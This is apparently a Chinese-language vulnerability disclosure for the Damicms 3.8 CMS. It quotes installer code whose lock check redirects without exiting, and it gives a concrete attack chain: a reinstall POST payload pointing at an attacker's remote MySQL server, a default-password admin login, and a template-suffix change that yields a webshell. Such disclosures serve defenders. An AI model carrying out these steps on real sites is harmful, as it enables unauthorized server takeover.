logo
DATABASE RESOURCES PRICING ABOUT US

大米cms 暴力getshell

Description

### 简要描述: rt.最近流行路人甲。 ### 详细说明: 看到 install\index.php ``` <?php header("Content-type:text/html;charset=utf-8"); include_once('./function.php'); define('ROOT',dirname(dirname(__FILE__))); $verMsg = 'v3.8'; $s_lang = 'utf-8'; $source_file = "./source/config.ini.php";//源配置文件 $target_file="../Public/Config/config.ini.php"; //目标配置文件。 $lock_file = '../install.lck';//锁定文件 if(file_exists($lock_file)){header('Location:../index.php');} ``` 判断 install.lck是否存在。 然而只是做了 header, 并没有exit。 页面只是跳转了,但是后面的代码还是会继续执行的。 攻击者可以 在自己的服务器上开放mysql数据库外联。然后对这个页面post数据 ``` step=4&dbhost=远程服务器ip&dbport=端口&dbuser=账户&dbpwd=密码&dbname=数据库名 ``` 就可以重装这个cms了。 然后使用默认密码进入后台, /admin.php?s=/Tpl/Update 将模板后缀命名为 php 即可getshell。 [<img src="https://images.seebug.org/upload/201410/280253584cb04426c33138386ef28fc4e3fc223d.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/280253584cb04426c33138386ef28fc4e3fc223d.jpg) ### 漏洞证明: 如上所述。官网就不测试了。